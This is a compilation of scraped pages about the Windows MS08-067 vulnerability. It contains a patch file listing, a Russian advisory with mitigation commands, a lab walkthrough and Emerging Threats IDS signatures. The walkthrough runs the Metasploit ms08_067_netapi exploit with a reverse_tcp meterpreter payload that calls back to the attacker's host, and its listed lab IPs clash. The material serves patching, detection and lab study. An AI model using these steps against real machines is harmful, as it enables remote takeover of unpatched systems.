09:47

Platform

Not Applicable

File name

Amd64_8c88416a1b833ae7bf1ac5e3ba55e123_31bf3856ad364e35_6.1.6801.4107_none_b94ab937111af08c.manifest

File version

Not Applicable

File size

696

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Amd64_9622219576c10955b3e5860711ff058f_31bf3856ad364e35_6.1.6801.4106_none_f398f52959e90ea9.manifest

File version

Not Applicable

File size

696

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Amd64_9ac4fb3739ecadbb3fe4552a8ce044b5_31bf3856ad364e35_6.1.6801.4106_none_5b9a53630b032ec0.manifest

File version

Not Applicable

File size

698

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Amd64_f2e520fe3e78b2637293494b1895dead_31bf3856ad364e35_6.1.6801.4107_none_88b415476ce0db7b.manifest

File version

Not Applicable

File size

1,037

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_2230761ac011a177.manifest

File version

Not Applicable

File size

2,403

Date (UTC)

18-Oct-2008

Time (UTC)

06:26

Platform

Not Applicable

File name

Amd64_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_c50a98bb08a2c330.manifest

File version

Not Applicable

File size

2,189

Date (UTC)

21-Oct-2008

Time (UTC)

08:33

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,827

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,827

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,045

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

2,045

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,045

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

2,045

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,832

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,832

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,814

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,814

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,476

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,476

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,465

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,465

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,951

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,951

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,474

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,474

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,476

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,476

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,465

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,465

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,470

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,470

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,475

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,475

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest

File version

Not Applicable

File size

2,401

Date (UTC)

18-Oct-2008

Time (UTC)

06:13

Platform

Not Applicable

File name

X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest

File version

Not Applicable

File size

2,187

Date (UTC)

21-Oct-2008

Time (UTC)

08:25

Platform

Not Applicable


Additional files for all supported ia64-based versions of Windows 7 Pre-Beta

File name

Ia64_063c1cfe8cbabfce3ffb0dc28ef38fc5_31bf3856ad364e35_6.1.6801.4107_none_b39a525ed326a3c8.manifest

File version

Not Applicable

File size

696

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Ia64_dc308b4973bef77766097858c0f07d87_31bf3856ad364e35_6.1.6801.4106_none_5a453cd060e99fe3.manifest

File version

Not Applicable

File size

696

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Ia64_f556a82744118350805ca73aa737ccaa_31bf3856ad364e35_6.1.6801.4107_none_ff5785ba70f128b5.manifest

File version

Not Applicable

File size

1,035

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Ia64_f6840120760844e1cf48807bba0611b4_31bf3856ad364e35_6.1.6801.4106_none_0132ac58e91cf28f.manifest

File version

Not Applicable

File size

1,035

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c6137e8d07b2393d.manifest

File version

Not Applicable

File size

2,402

Date (UTC)

18-Oct-2008

Time (UTC)

05:34

Platform

Not Applicable

File name

Ia64_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68eda12d50435af6.manifest

File version

Not Applicable

File size

2,188

Date (UTC)

21-Oct-2008

Time (UTC)

06:53

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

2,040

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

2,040

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,827

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,827

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,468

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,468

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,469

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,469

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,472

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,472

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,460

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,460

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest

File version

Not Applicable

File size

2,401

Date (UTC)

18-Oct-2008

Time (UTC)

06:13

Platform

Not Applicable

File name

X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest

File version

Not Applicable

File size

2,187

Date (UTC)

21-Oct-2008

Time (UTC)

08:25

Platform

Not Applicable
Источник

В этой статье мы сделаем попытку изложить максимальное количество подробностей и дать рекомендации по устранению уязвимости.

Вчера Microsoft выпустила внеплановое исправление MS08-067, устраняющее критическую уязвимость в службе Server во всех ОС Windows. В этой статье мы сделаем попытку изложить максимальное количество подробностей и дать рекомендации по устранению уязвимости.

Краткое описание уязвимости

Уязвимость существует из-за ошибки в библиотеке netapi32.dll при обработке RPC запросов в службе Server. Удаленный пользователь может с помощью специально сформированного RPC запроса вызвать переполнение буфера в стеке и вызвать отказ в обслуживании системы или выполнить произвольный код на целевой системе с привилегиями учетной записи SYSTEM.

Технические подробности уязвимости

Уязвимость существует в библиотеке netapi32.dll из-за ошибки в механизме подсчета аргументов функции wcscpy_s(dest, len, source), расширяемой макрос
_tcscpy_s(previousLastSlash, pBufferEnd — previousLastSlash, ptr + 2);
который в цикле while() обрабатывает большое количество постоянно обновляемых аргументов.

Потенциальная опасность уязвимости

SecurityLab выставил максимальный рейтинг опасности уязвимости — критический. Эта уязвимость активно эксплуатируется в настоящее время и в общем доступе на момент написания этой статьи находится PoC код.

Уязвимость может эксплуатироваться анонимным пользователем на Windows 2000/XP/2003 и аутентифицированным пользователем на Windows Vista/2008. Для успешной эксплуатации уязвимости атакующему потребуется получить доступ к RPC интерфейсу системы. По умолчанию, межсетевой экран (МСЭ) включен на Windows XP SP2, Windows Vista и Windows Server 2008. Итак, злоумышленник может воспользоваться уязвимость в следующих случаях:

  • МСЭ отключен
  • МСЭ включен, но также разрешена служба доступа к файлам и принтерам

Следующая таблица демонстрирует опасность для каждой платформы:

Описание/векторы воздействия и механизмы защиты

Анонимный доступ

Аутентификация

DEP

ASLR

МСЭ

Windows 2000 – удаленное выполнение кода

Станция, подключенная к домену

+

Общий доступ к файлам и принтерам

+

Домашний ПК

+

Доступ к общим файлам (домашний ПК)

+

Windows XP SP2 – удаленное выполнение кода (DEP без ASLR)

Станция, подключенная к домену

+

+

*

Общий доступ к файлам и принтерам

+

+

Домашний ПК

+

+

+

Доступ к общим файлам (домашний ПК)

+

+

Windows Server 2003 – удаленное выполнение кода (DEP без ASLR)

Станция, подключенная к домену

+

+

Общий доступ к файлам и принтерам

+

+

Домашний ПК

+

+

Доступ к общим файлам (домашний ПК)

+

+

Windows Vista — отказ в обслуживании (DEP+ASLR)

Станция, подключенная к домену

+

+

+

*

Общий доступ к файлам и принтерам

+

+

+

**

Домашний ПК

+

+

+

+

Защищенный паролем доступ к общим файлам (домашний ПК)

+

+

+

***

Windows Server 2008 — отказ в обслуживании (DEP+ASLR)

Станция, подключенная к домену

+

+

+

*

Общий доступ к файлам и принтерам

+

+

+

**

Домашний ПК

+

+

+

+

Защищенный паролем доступ к общим файлам (домашний ПК)

+

+

+

***

Примечания:
* МСЭ включен по умолчанию без допускаемых исключений, хотя многие домены включают исключения.
** Общий доступ к файлам и принтерам включает исключение для соответствующего типа сетевого подключения. Общий доступ к частной сети не позволяет доступ из публичной сети.
*** Отключения пароля для доступа к общим ресурсам автоматически разрешает анонимные подключения.

Механизмы защиты и противодействия

Временное решение

Следующие инструкции позволят устранить или уменьшит риск удачной эксплуатации уязвимости, но могут повлиять на работу вашей сети.

1. Для всех ОС:

  • Отключить службы Сервер (Server)и Обозреватель сети (Computer Browser)
  • Блокировка доступа к портам 139/tcp и 445/tcp

2. Отфильтровать уязвимый RPC идентификатор.

  • Для Windows Vista и Windows 2008

В дополнение к блокированию портов, Windows Vista и Windows Server 2008 могут выборочно заблокировать RPC Universally Unique Identifiers (UUID). Для предотвращения уязвимости добавьте правило для блокирования всех RPC запросов с UUID, равным 4b324fc8-1670-01d3-1278-5a47bf6ee188. Пример:
netsh>rpc
netsh rpc>filter
netsh rpc filter>add rule layer=um actiontype=block
netsh rpc filter>add condition field=if_uuid matchtype=equal data=4b324fc8-1670-01d3-1278-5a47bf6ee188
netsh rpc filter>add filter
netsh rpc filter>quit
Filter Key – является случайным образом сгенерированный для вашей системы UUID. Для проверки работоспособности фильтра выполните команду:

netsh rpc filter show filter

Если добавление фильтра было успешным, в командной строке будут отображены следующие данные:

Listing all RPC Filters.
---------------------------------
filterKey: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
displayData.name: RPCFilter
displayData.description: RPC Filter
filterId: 0x12f79
layerKey: um
weight: Type: FWP_EMPTY Value: Empty
action.type: block
numFilterConditions: 1

где filterKey: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx равен вашему случайным образом сгенерированому UUID.

Для удаления фильтра после установки исправления следует выполнить следующую команду:

netsh rpc filter delete filter xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

  • Для МСЭ с возможностью фильтрации RPC трафика (например, ISA)

Создать правило блокировки RPC трафика по UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188.

3. Изменить списки контроля доступа к уязвимому именному каналу

Microsoft разработала утилиту (http://blogs.technet.com/swi/attachment/3140932.ashx), которая может позволить изменить списки контроля доступа к именованному каналу в пределах сессии пользователя.

Пример использования:

Для службы Сервер:

C:>chacl.exe \.pipesrvsvc
opening up \.pipesrvsvc
Got back 3 ACE entries
Found an entry for ANONYMOUS LOGON. Deleting it...
deleted that ACE

Для службы Обозреватель сети:

C:>chacl.exe \.pipebrowser
opening up \.pipebrowser
Got back 3 ACE entries
Found an entry for ANONYMOUS LOGON. Deleting it...
deleted that ACE

Использование этой утилиты позволит удалить анонимный доступ из списка контроля доступа именных каналов, что ограничивает возможность атаки только аутентифицированными пользователями.

Примечание: это решение действует только в приделах сессии пользователя и после перезагрузки системы вышеперечисленные действия нужно будет повторно выполнить.

Ссылки:

http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
http://blogs.msdn.com/sdl/archive/2008/10/22/ms08-067.aspx
http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx
http://blogs.technet.com/swi/attachment/3140932.ashx
http://technet.microsoft.com/ru-ru/library/cc751161(en-us).aspx
http://www.securitylab.ru/vulnerability/361770.php
http://www.securitylab.ru/poc/361823.php

Валерий Марчук
www.Securitylab.ru

Источник

{Requirements:}
————————
All Machines Running on VM

1. Kali Linux (172.16.66.193)
2. Windows XP SP2 (172.16.66.193)
3. IDS — Suricata

{Scan for open ports:}
———————————-
root@fikri:~# nmap -n -sV 172.16.66.199

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-17 10:25 MYT
Nmap scan report for 172.16.66.199
Host is up (0.11s latency).
Not shown: 918 closed ports, 79 filtered ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows 98 netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:D1:55:23 (VMware)
Service Info: OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.51 seconds

{Exploit:}
—————
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   —-     —————  ———  ————
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   —  —-
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 172.16.66.199
RHOST => 172.16.66.199
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   —-     —————  ———  ————
   RHOST    172.16.66.199    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   —-      —————  ———  ————
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   —  —-
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 172.16.66.193
LHOST => 172.16.66.193
msf exploit(ms08_067_netapi) > set LPORT 6666
LPORT => 6666
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.66.193:6666
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP — Service Pack 2 — lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (885806 bytes) to 172.16.66.199
[*] Meterpreter session 1 opened (172.16.66.193:6666 -> 172.16.66.199:1069) at 2015-12-17 10:41:14 +0800

{Suricata}
—————

12/17/2015-10:41:18.639748  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable Code was Detected] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable Code was Detected] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445

{«timestamp»:»2015-12-17T10:25:50.527735″,»event_type»:»http»,»src_ip»:»172.16.66.193″,»src_port»:35357,»dest_ip»:»172.16.66.199″,»dest_port»:139,»proto»:»TCP»,»http»:{«url»:»/»,»http_method»:»GET»,»protocol»:»HTTP/1.0″,»length»:0}}
{«timestamp»:»2015-12-17T10:25:50.527735″,»event_type»:»http»,»src_ip»:»172.16.66.193″,»src_port»:35357,»dest_ip»:»172.16.66.199″,»dest_port»:139,»proto»:»TCP»,»http»:{«url»:»/»,»http_method»:»GET»,»protocol»:»HTTP/1.0″,»length»:0}}
{«timestamp»:»2015-12-17T10:41:18.639748″,»event_type»:»alert»,»src_ip»:»172.16.66.193″,»src_port»:43859,»dest_ip»:»172.16.66.199″,»dest_port»:445,»proto»:»TCP»,»alert»:{«action»:»allowed»,»gid»:1,»signature_id»:2008705,»rev»:5,»signature»:»ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (15)»,»category»:»Attempted Administrator Privilege Gain»,»severity»:1}}
{«timestamp»:»2015-12-17T10:41:18.639748″,»event_type»:»alert»,»src_ip»:»172.16.66.193″,»src_port»:43859,»dest_ip»:»172.16.66.199″,»dest_port»:445,»proto»:»TCP»,»alert»:{«action»:»allowed»,»gid»:1,»signature_id»:2009247,»rev»:3,»signature»:»ET SHELLCODE Rothenburg Shellcode»,»category»:»Executable Code was Detected»,»severity»:1}}
{«timestamp»:»2015-12-17T10:41:18.639748″,»event_type»:»alert»,»src_ip»:»172.16.66.193″,»src_port»:43859,»dest_ip»:»172.16.66.199″,»dest_port»:445,»proto»:»TCP»,»alert»:{«action»:»allowed»,»gid»:1,»signature_id»:2008705,»rev»:5,»signature»:»ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound — MS08-067 (15)»,»category»:»Attempted Administrator Privilege Gain»,»severity»:1}}
{«timestamp»:»2015-12-17T10:41:18.639748″,»event_type»:»alert»,»src_ip»:»172.16.66.193″,»src_port»:43859,»dest_ip»:»172.16.66.199″,»dest_port»:445,»proto»:»TCP»,»alert»:{«action»:»allowed»,»gid»:1,»signature_id»:2009247,»rev»:3,»signature»:»ET SHELLCODE Rothenburg Shellcode»,»category»:»Executable Code was Detected»,»severity»:1}}

{References:}
1. https://community.rapid7.com/community/infosec/blog/2014/02/03/new-ms08-067

Источник

2009886

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS Remote SMB2.0 DoS Exploit"; flow:to_server,established; content:"|ff|SMB|72 00 00 00 00 18 53 c8|"; offset:4; content:!"|00 00|"; within:2; reference:url,securityreason.com/exploitalert/7138; reference:url,doc.emergingthreats.net/2009886; classtype:attempted-dos; sid:2009886; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : Remote SMB2.0 DoS Exploit

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : url,securityreason.com/exploitalert/7138|url,doc.emergingthreats.net/2009886

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2000046

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS MS04011 Lsasrv.dll RPC exploit (Win2k)"; flow: to_server,established; content:"|00 00 00 00 9A A8 40 00 01 00 00 00 00 00 00 00|"; content:"|01 0000 00 00 00 00 00 9A A8 40 00 01 00 00 00|"; reference:url,doc.emergingthreats.net/bin/view/Main/2000046; reference:cve,2003-0533; classtype:misc-activity; sid:2000046; rev:9; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : MS04011 Lsasrv.dll RPC exploit (Win2k)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-activity

URL reference : url,doc.emergingthreats.net/bin/view/Main/2000046|cve,2003-0533

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2000033

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS MS04011 Lsasrv.dll RPC exploit (WinXP)"; flow: to_server,established; content:"|95 14 40 00 03 00 00 00 7C 70 40 00 01|"; content:"|78 85 13 00 AB5B A6 E9 31 31|"; reference:url,doc.emergingthreats.net/bin/view/Main/2000033; reference:cve,2003-0533; classtype:misc-activity; sid:2000033; rev:9; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : MS04011 Lsasrv.dll RPC exploit (WinXP)

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : misc-activity

URL reference : url,doc.emergingthreats.net/bin/view/Main/2000033|cve,2003-0533

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002064

#alert tcp $HOME_NET 445 -> $EXTERNAL_NET any (msg:"ET NETBIOS ms05-011 exploit"; flow:from_server,established; content:"|00|"; depth:1; content:"|FF|SMB|32|"; depth:9; offset:4; content: "|ff ff ff ff 00 00 00 00 ff|"; offset: 132; depth: 141; reference:bugtraq,12484; reference:url,www.frsirt.com/exploits/20050623.mssmb_poc.c.php; reference:url,doc.emergingthreats.net/bin/view/Main/2002064; classtype:attempted-admin; sid:2002064; rev:7; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : ms05-011 exploit

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,12484|url,www.frsirt.com/exploits/20050623.mssmb_poc.c.php|url,doc.emergingthreats.net/bin/view/Main/2002064

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002186

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB-DS Microsoft Windows 2000 Plug and Play Vulnerability"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|67157a76|"; reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; reference:url,isc.sans.org/diary.php?date=2005-08-14; reference:url,doc.emergingthreats.net/bin/view/Main/2002186; classtype:attempted-admin; sid:2002186; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB-DS Microsoft Windows 2000 Plug and Play Vulnerability

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx|url,isc.sans.org/diary.php?date=2005-08-14|url,doc.emergingthreats.net/bin/view/Main/2002186

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002199

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"ET NETBIOS SMB-DS DCERPC PnP HOD bind attempt"; flow:to_server,established; content:"|FF|SMB%"; depth:5; offset:4; nocase; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; within:12; distance:5; nocase; content:"|05|"; within:1; distance:4; content:"|0B|"; within:1; distance:1; content:"|40 4E 9F 8D 3D A0 CE 11 8F 69 08 00 3E 30 05 1B|"; flowbits:set,netbios.pnp.bind.attempt; flowbits:noalert; reference:url,doc.emergingthreats.net/bin/view/Main/2002199; classtype:protocol-command-decode; sid:2002199; rev:4; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Name : SMB-DS DCERPC PnP HOD bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : url,doc.emergingthreats.net/bin/view/Main/2002199

CVE reference : Not defined

Creation date : 2010-07-30

Last modified date : 2010-07-30

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2002200

